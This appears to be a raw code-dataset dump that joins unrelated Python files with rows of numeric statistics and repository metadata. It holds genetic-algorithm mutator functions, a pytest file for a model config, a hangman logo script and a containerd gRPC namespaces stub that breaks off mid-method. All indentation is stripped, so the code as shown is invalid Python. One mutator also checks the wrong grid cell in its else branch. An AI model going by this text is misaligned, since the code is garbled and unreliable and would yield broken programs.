final_value = genome[which_gene] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("maxima")[which_gene])
final_value = max(final_value, genome.getParam("minima")[which_gene])
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorRealGaussianGradient(genome, **args):
""" The mutator of G1DList, Gaussian Gradient Mutator
Accepts the *rangemin* and *rangemax* genome parameters, both optional. The
random distribution is set with mu=1.0 and std=0.0333
The difference between this routine and the normal Gaussian Real is that the
other function generates a gaussian value and adds it to the value. If the
mu is 0, and the std is 1, a typical value could be 1.8 or -0.5. These small
values are fine if your range is 0-10, but if your range is much larger, like
0-100,000, a relative gradient makes sense.
This routine generates a gaussian value with mu=1.0 and std=0.0333 and then
the gene is multiplied by this value. This will cause the gene to drift
no matter how large it is.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
mu = constants.CDefGaussianGradientMU
sigma = constants.CDefGaussianGradientSIGMA
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[it] * abs(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
final_value = genome[which_gene] * abs(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorIntegerBinary(genome, **args):
""" The mutator of G1DList, the binary mutator
This mutator will random change the 0 and 1 elements of the 1D List.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * (listSize)
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
if genome[it] == 0:
genome[it] = 1
elif genome[it] == 1:
genome[it] = 0
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
if genome[which_gene] == 0:
genome[which_gene] = 1
elif genome[which_gene] == 1:
genome[which_gene] = 0
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorAllele(genome, **args):
""" The mutator of G1DList, Allele Mutator
To use this mutator, you must specify the *allele* genome parameter with the
:class:`GAllele.GAlleles` instance.
"""
if args["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = args["pmut"] * listSize
allele = genome.getParam("allele", None)
if allele is None:
utils.raiseException("to use the G1DListMutatorAllele, you must specify the 'allele' parameter", TypeError)
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(args["pmut"]):
new_val = allele[it].getRandomAllele()
genome[it] = new_val
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
new_val = allele[which_gene].getRandomAllele()
genome[which_gene] = new_val
return int(mutations)
# -----------------------------------------------------------------
def G1DListMutatorAlleleGaussian(genome, **arguments):
"""An allele-based mutator based on G1DListMutatorRealGaussian.
Accepts the parameter *gauss_mu* and the *gauss_sigma* which
respectively represents the mean and the std. dev. of the random
distribution.
"""
if arguments["pmut"] <= 0.0:
return 0
listSize = len(genome)
mutations = arguments["pmut"] * listSize
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG1DListMutRealMU
if sigma is None:
sigma = constants.CDefG1DListMutRealSIGMA
allele = genome.getParam("allele", None)
if allele is None:
utils.raiseException("to use this mutator, you must specify the 'allele' parameter", TypeError)
if mutations < 1.0:
mutations = 0
for it in xrange(listSize):
if utils.randomFlipCoin(arguments["pmut"]):
final_value = genome[it] + prng.normal(mu, sigma)
assert len(allele[it].beginEnd) == 1, "only single ranges are supported"
rangemin, rangemax = allele[it].beginEnd[0]
final_value = min(final_value, rangemax)
final_value = max(final_value, rangemin)
genome[it] = final_value
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_gene = prng.randint(0, listSize)
final_value = genome[which_gene] + prng.normal(mu, sigma)
assert len(allele[which_gene].beginEnd) == 1, "only single ranges are supported"
rangemin, rangemax = allele[which_gene].beginEnd[0]
final_value = min(final_value, rangemax)
final_value = max(final_value, rangemin)
genome[which_gene] = final_value
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorSwap(genome, **args):
""" The mutator of G1DList, Swap Mutator
.. note:: this mutator is :term:`Data Type Independent`
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
if mutations < 1.0:
mutations = 0
for i in xrange(height):
for j in xrange(width):
if utils.randomFlipCoin(args["pmut"]):
index_b = (prng.randint(0, height), prng.randint(0, width))
utils.list2DSwapElement(genome.genomeList, (i, j), index_b)
mutations += 1
else:
for it in xrange(int(round(mutations))):
index_a = (prng.randint(0, height), prng.randint(0, width))
index_b = (prng.randint(0, height), prng.randint(0, width))
utils.list2DSwapElement(genome.genomeList, index_a, index_b)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorIntegerRange(genome, **args):
""" Simple integer range mutator for G2DList
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
range_min = genome.getParam("rangemin", constants.CDefRangeMin)
range_max = genome.getParam("rangemax", constants.CDefRangeMax)
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
random_int = prng.randint(range_min, range_max + 1) # HERE IT SHOULD BE INCLUSIVE
genome.setItem(i, j, random_int)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
random_int = prng.randint(range_min, range_max + 1) # HERE IT SHOULD BE INCLUSIVE
genome.setItem(which_y, which_x, random_int)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorIntegerGaussianGradient(genome, **args):
"""
A gaussian mutator for G2DList of Integers
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
This routine generates a gaussian value with mu=1.0 and std=0.0333 and then
the gene is multiplied by this value. This will cause the gene to drift
no matter how large it is.
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
mu = constants.CDefGaussianGradientMU
sigma = constants.CDefGaussianGradientSIGMA
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
final_value = int(genome[i][j] * abs(prng.normal(mu, sigma)))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(i, j, final_value)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
final_value = int(genome[which_y][which_x] * abs(prng.normal(mu, sigma)))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(which_y, which_x, final_value)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorIntegerGaussian(genome, **args):
"""
A gaussian mutator for G2DList of Integers
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG2DListMutIntMU
if sigma is None:
sigma = constants.CDefG2DListMutIntSIGMA
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[i][j] + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(i, j, final_value)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
final_value = genome[which_y][which_x] + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(which_y, which_x, final_value)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorAllele(genome, **args):
""" The mutator of G2DList, Allele Mutator
To use this mutator, you must specify the *allele* genome parameter with the
:class:`GAllele.GAlleles` instance.
.. warning:: the :class:`GAllele.GAlleles` instance must have the homogeneous flag enabled
"""
if args["pmut"] <= 0.0:
return 0
listSize = genome.getHeight() * genome.getWidth() - 1
mutations = args["pmut"] * (listSize + 1)
allele = genome.getParam("allele", None)
if allele is None:
utils.raiseException("to use the G2DListMutatorAllele, you must specify the 'allele' parameter", TypeError)
if not allele.homogeneous:
utils.raiseException("to use the G2DListMutatorAllele, the 'allele' must be homogeneous")
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
new_val = allele[0].getRandomAllele()
genome.setItem(i, j, new_val)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getHeight())
which_y = prng.randint(0, genome.getWidth())
new_val = allele[0].getRandomAllele()
genome.setItem(which_x, which_y, new_val)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorRealGaussian(genome, **args):
""" A gaussian mutator for G2DList of Real
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
mu = genome.getParam("gauss_mu")
sigma = genome.getParam("gauss_sigma")
if mu is None:
mu = constants.CDefG2DListMutRealMU
if sigma is None:
sigma = constants.CDefG2DListMutRealSIGMA
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[i][j] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(i, j, final_value)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
final_value = genome[which_y][which_x] + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(which_y, which_x, final_value)
return int(mutations)
# -----------------------------------------------------------------
def G2DListMutatorRealGaussianGradient(genome, **args):
""" A gaussian gradient mutator for G2DList of Real
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
The difference is that this multiplies the gene by gauss(1.0, 0.0333), allowing
for a smooth gradient drift about the value.
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
mu = constants.CDefGaussianGradientMU
sigma = constants.CDefGaussianGradientSIGMA
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
final_value = genome[i][j] * abs(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(i, j, final_value)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
final_value = genome[which_y][which_x] * abs(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
genome.setItem(which_y, which_x, final_value)
return int(mutations)
# -----------------------------------------------------------------
def G2DBinaryStringMutatorSwap(genome, **args):
""" The mutator of G2DBinaryString, Swap Mutator
.. versionadded:: 0.6
The *G2DBinaryStringMutatorSwap* function
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
if mutations < 1.0:
mutations = 0
for i in xrange(height):
for j in xrange(width):
if utils.randomFlipCoin(args["pmut"]):
index_b = (prng.randint(0, height), prng.randint(0, width))
utils.list2DSwapElement(genome.genomeString, (i, j), index_b)
mutations += 1
else:
for it in xrange(int(round(mutations))):
index_a = (prng.randint(0, height), prng.randint(0, width))
index_b = (prng.randint(0, height), prng.randint(0, width))
utils.list2DSwapElement(genome.genomeString, index_a, index_b)
return int(mutations)
# -----------------------------------------------------------------
def G2DBinaryStringMutatorFlip(genome, **args):
""" A flip mutator for G2DBinaryString
.. versionadded:: 0.6
The *G2DBinaryStringMutatorFlip* function
"""
if args["pmut"] <= 0.0:
return 0
height, width = genome.getSize()
elements = height * width
mutations = args["pmut"] * elements
if mutations < 1.0:
mutations = 0
for i in xrange(genome.getHeight()):
for j in xrange(genome.getWidth()):
if utils.randomFlipCoin(args["pmut"]):
if genome[i][j] == 0:
genome.setItem(i, j, 1)
else:
genome.setItem(i, j, 0)
mutations += 1
else:
for it in xrange(int(round(mutations))):
which_x = prng.randint(0, genome.getWidth())
which_y = prng.randint(0, genome.getHeight())
if genome[i][j] == 0:
genome.setItem(which_y, which_x, 1)
else:
genome.setItem(which_y, which_x, 0)
return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorSwap(genome, **args):
""" The mutator of GTree, Swap Mutator
.. versionadded:: 0.6
The *GTreeMutatorSwap* function
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
nodeOne = genome.getRandomNode()
nodeTwo = genome.getRandomNode()
nodeOne.swapNodeData(nodeTwo)
else:
for it in xrange(int(round(mutations))):
nodeOne = genome.getRandomNode()
nodeTwo = genome.getRandomNode()
nodeOne.swapNodeData(nodeTwo)
return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorIntegerRange(genome, **args):
""" The mutator of GTree, Integer Range Mutator
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
.. versionadded:: 0.6
The *GTreeMutatorIntegerRange* function
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
range_min = genome.getParam("rangemin", constants.CDefRangeMin)
range_max = genome.getParam("rangemax", constants.CDefRangeMax)
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
rand_node = genome.getRandomNode()
random_int = prng.randint(range_min, range_max + 1) # HERE IT SHOULD BE INCLUSIVE
rand_node.setData(random_int)
else:
for it in xrange(int(round(mutations))):
rand_node = genome.getRandomNode()
random_int = prng.randint(range_min, range_max + 1) # HERE IT SHOULD BE INCLUSIVE
rand_node.setData(random_int)
return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorRealRange(genome, **args):
""" The mutator of GTree, Real Range Mutator
Accepts the *rangemin* and *rangemax* genome parameters, both optional.
.. versionadded:: 0.6
The *GTreeMutatorRealRange* function
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
range_min = genome.getParam("rangemin", constants.CDefRangeMin)
range_max = genome.getParam("rangemax", constants.CDefRangeMax)
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
rand_node = genome.getRandomNode()
random_real = prng.uniform(range_min, range_max)
rand_node.setData(random_real)
else:
for it in xrange(int(round(mutations))):
rand_node = genome.getRandomNode()
random_real = prng.uniform(range_min, range_max)
rand_node.setData(random_real)
return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorIntegerGaussian(genome, **args):
""" A gaussian mutator for GTree of Integers
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
mu = genome.getParam("gauss_mu", constants.CDefG1DListMutIntMU)
sigma = genome.getParam("gauss_sigma", constants.CDefG1DListMutIntSIGMA)
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
rand_node = genome.getRandomNode()
final_value = rand_node.getData() + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
rand_node.setData(final_value)
else:
for it in xrange(int(round(mutations))):
rand_node = genome.getRandomNode()
final_value = rand_node.getData() + int(prng.normal(mu, sigma))
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
rand_node.setData(final_value)
return int(mutations)
# -----------------------------------------------------------------
def GTreeMutatorRealGaussian(genome, **args):
""" A gaussian mutator for GTree of Real numbers
Accepts the *rangemin* and *rangemax* genome parameters, both optional. Also
accepts the parameter *gauss_mu* and the *gauss_sigma* which respectively
represents the mean and the std. dev. of the random distribution.
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
mu = genome.getParam("gauss_mu", constants.CDefG1DListMutRealMU)
sigma = genome.getParam("gauss_sigma", constants.CDefG1DListMutRealSIGMA)
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
rand_node = genome.getRandomNode()
final_value = rand_node.getData() + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
rand_node.setData(final_value)
else:
for it in xrange(int(round(mutations))):
rand_node = genome.getRandomNode()
final_value = rand_node.getData() + prng.normal(mu, sigma)
final_value = min(final_value, genome.getParam("rangemax", constants.CDefRangeMax))
final_value = max(final_value, genome.getParam("rangemin", constants.CDefRangeMin))
rand_node.setData(final_value)
return int(mutations)
# -----------------------------------------------------------------
def GTreeGPMutatorOperation(genome, **args):
""" The mutator of GTreeGP, Operation Mutator
.. versionadded:: 0.6
The *GTreeGPMutatorOperation* function
"""
if args["pmut"] <= 0.0:
return 0
elements = len(genome)
mutations = args["pmut"] * elements
ga_engine = args["ga_engine"]
gp_terminals = ga_engine.getParam("gp_terminals")
assert gp_terminals is not None
gp_function_set = ga_engine.getParam("gp_function_set")
assert gp_function_set is not None
if mutations < 1.0:
mutations = 0
for i in xrange(len(genome)):
if utils.randomFlipCoin(args["pmut"]):
mutations += 1
rand_node = genome.getRandomNode()
assert rand_node is not None
if rand_node.getType() == constants.nodeType["TERMINAL"]:
term_operator = prng.choice(gp_terminals)
else:
op_len = gp_function_set[rand_node.getData()]
fun_candidates = []
for o, l in gp_function_set.items():
if l == op_len:
fun_candidates.append(o)
if len(fun_candidates) <= 0:
continue
term_operator = prng.choice(fun_candidates)
rand_node.setData(term_operator)
else:
for it in xrange(int(round(mutations))):
rand_node = genome.getRandomNode()
assert rand_node is not None
if rand_node.getType() == constants.nodeType["TERMINAL"]:
term_operator = prng.choice(gp_terminals)
else:
op_len = gp_function_set[rand_node.getData()]
fun_candidates = []
for o, l in gp_function_set.items():
if l == op_len:
fun_candidates.append(o)
if len(fun_candidates) <= 0:
continue
term_operator = prng.choice(fun_candidates)
rand_node.setData(term_operator)
return int(mutations)
# -----------------------------------------------------------------
def GTreeGPMutatorSubtree(genome, **args):
""" The mutator of GTreeGP, Subtree Mutator
This mutator will recreate random subtree of the tree using the grow algorithm.
.. versionadded:: 0.6
The *GTreeGPMutatorSubtree* function
"""
if args["pmut"] <= 0.0:
return 0
ga_engine = args["ga_engine"]
max_depth = genome.getParam("max_depth", None)
mutations = 0
if max_depth is None:
utils.raiseException("You must specify the max_depth genome parameter !", ValueError)
if max_depth < 0:
utils.raiseException("The max_depth must be >= 1, if you want to use GTreeGPMutatorSubtree crossover !", ValueError)
branch_list = genome.nodes_branch
elements = len(branch_list)
for i in xrange(elements):
node = branch_list[i]
assert node is not None
if utils.randomFlipCoin(args["pmut"]):
depth = genome.getNodeDepth(node)
mutations += 1
root_subtree = tree.buildGTreeGPGrow(ga_engine, 0, max_depth - depth)
node_parent = node.getParent()
if node_parent is None:
genome.setRoot(root_subtree)
genome.processNodes()
return mutations
else:
root_subtree.setParent(node_parent)
node_parent.replaceChild(node, root_subtree)
genome.processNodes()
return int(mutations)
# -----------------------------------------------------------------
| 32.927663 | 129 | 0.60155 | 4,683 | 41,423 | 5.237241 | 0.072176 | 0.058713 | 0.039142 | 0.043056 | 0.827122 | 0.808897 | 0.780152 | 0.767838 | 0.74949 | 0.73575 | 0 | 0.014563 | 0.239118 | 41,423 | 1,257 | 130 | 32.953858 | 0.763564 | 0.210221 | 0 | 0.808 | 0 | 0 | 0.048179 | 0.002618 | 0 | 0 | 0 | 0 | 0.009333 | 1 | 0.041333 | false | 0 | 0.005333 | 0 | 0.132 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5974017c156e95d28bac08b780a8c810da195bc2 | 1,330 | py | Python | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 5 | 2019-10-19T13:00:34.000Z | 2022-01-16T17:31:42.000Z | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | 162 | 2019-08-22T10:28:46.000Z | 2022-03-28T17:33:16.000Z | tests/sequence_labelling/config_test.py | elifesciences/sciencebeam-trainer-delft | 0f7da96cdf32acf1538a5fded192255158883ba0 | [
"MIT"
] | null | null | null | from sciencebeam_trainer_delft.sequence_labelling.config import ModelConfig
FEATURE_INDICES_1 = [9, 10, 11]
FEATURES_EMBEDDING_SIZE_1 = 13
class TestModelConfig:
def test_should_be_able_to_pass_in_feature_indices(self):
model_config = ModelConfig(feature_indices=FEATURE_INDICES_1)
assert model_config.feature_indices == FEATURE_INDICES_1
assert model_config.features_indices == FEATURE_INDICES_1
def test_should_be_able_to_pass_in_features_indices(self):
model_config = ModelConfig(features_indices=FEATURE_INDICES_1)
assert model_config.feature_indices == FEATURE_INDICES_1
assert model_config.features_indices == FEATURE_INDICES_1
def test_should_be_able_to_pass_in_feature_embedding_size(self):
model_config = ModelConfig(feature_embedding_size=FEATURES_EMBEDDING_SIZE_1)
assert model_config.feature_embedding_size == FEATURES_EMBEDDING_SIZE_1
assert model_config.features_embedding_size == FEATURES_EMBEDDING_SIZE_1
def test_should_be_able_to_pass_in_features_embedding_size(self):
model_config = ModelConfig(features_embedding_size=FEATURES_EMBEDDING_SIZE_1)
assert model_config.feature_embedding_size == FEATURES_EMBEDDING_SIZE_1
assert model_config.features_embedding_size == FEATURES_EMBEDDING_SIZE_1
| 45.862069 | 85 | 0.814286 | 176 | 1,330 | 5.573864 | 0.181818 | 0.198777 | 0.235474 | 0.146789 | 0.866463 | 0.79103 | 0.711519 | 0.703364 | 0.696228 | 0.654434 | 0 | 0.018357 | 0.13985 | 1,330 | 28 | 86 | 47.5 | 0.839161 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | false | 0.2 | 0.05 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
59751099bf10bf46cf21577189d2b4009e42f7f9 | 514 | py | Python | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | Subject1/1.4.1.py | MosheBakshi/HANGMAN | 49750b98ac54f5eee9378ed66fd67d6dd57dc29a | [
"MIT"
] | null | null | null | import random
print("""
_ _
| | | |
| |__| | __ _ _ __ __ _ _ __ ___ __ _ _ __
| __ |/ _` | '_ \ / _` | '_ ` _ \ / _` | '_ \
| | | | (_| | | | | (_| | | | | | | (_| | | | |
|_| |_|\__,_|_| |_|\__, |_| |_| |_|\__,_|_| |_|
__/ |
|___/
""")
random.seed(a=None, version=2)
print(random.randint(5, 10))
""" ASCII ART LOGO FOR THE HANGMAN GAME """
| 28.555556 | 49 | 0.289883 | 21 | 514 | 4.285714 | 0.857143 | 0.244444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01581 | 0.507782 | 514 | 17 | 50 | 30.235294 | 0.339921 | 0 | 0 | 0 | 0 | 0.230769 | 0.804671 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.076923 | 0 | 0.076923 | 0.153846 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
599bf6f0e012a31eebfb7a79a0d3a2134dcfd5d0 | 6,631 | py | Python | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | api_1.3/containerd/services/namespaces/v1/namespace_pb2_grpc.py | Silvanoc/pycontainerd | 7245ce623d978f65cd8a4cf0d685a3318640a305 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from containerd.services.namespaces.v1 import namespace_pb2 as containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2
from containerd.vendor.google.protobuf import empty_pb2 as containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2
class NamespacesStub(object):
"""Namespaces provides the ability to manipulate containerd namespaces.
All objects in the system are required to be a member of a namespace. If a
namespace is deleted, all objects, including containers, images and
snapshots, will be deleted, as well.
Unless otherwise noted, operations in containerd apply only to the namespace
supplied per request.
I hope this goes without saying, but namespaces are themselves NOT
namespaced.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/containerd.services.namespaces.v1.Namespaces/Get',
request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.GetNamespaceResponse.FromString,
)
self.List = channel.unary_unary(
'/containerd.services.namespaces.v1.Namespaces/List',
request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.ListNamespacesResponse.FromString,
)
self.Create = channel.unary_unary(
'/containerd.services.namespaces.v1.Namespaces/Create',
request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.CreateNamespaceResponse.FromString,
)
self.Update = channel.unary_unary(
'/containerd.services.namespaces.v1.Namespaces/Update',
request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceRequest.SerializeToString,
response_deserializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.UpdateNamespaceResponse.FromString,
)
self.Delete = channel.unary_unary(
'/containerd.services.namespaces.v1.Namespaces/Delete',
request_serializer=containerd_dot_services_dot_namespaces_dot_v1_dot_namespace__pb2.DeleteNamespaceRequest.SerializeToString,
response_deserializer=containerd_dot_vendor_dot_google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class NamespacesServicer(object):
"""Namespaces provides the ability to manipulate containerd namespaces.
All objects in the system are required to be a member of a namespace. If a
namespace is deleted, all objects, including containers, images and
snapshots, will be deleted, as well.
Unless otherwise noted, operations in containerd apply only to the namespace
supplied per request.
I hope this goes without saying, but namespaces are themselves NOT
namespaced.
"""
def Get(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
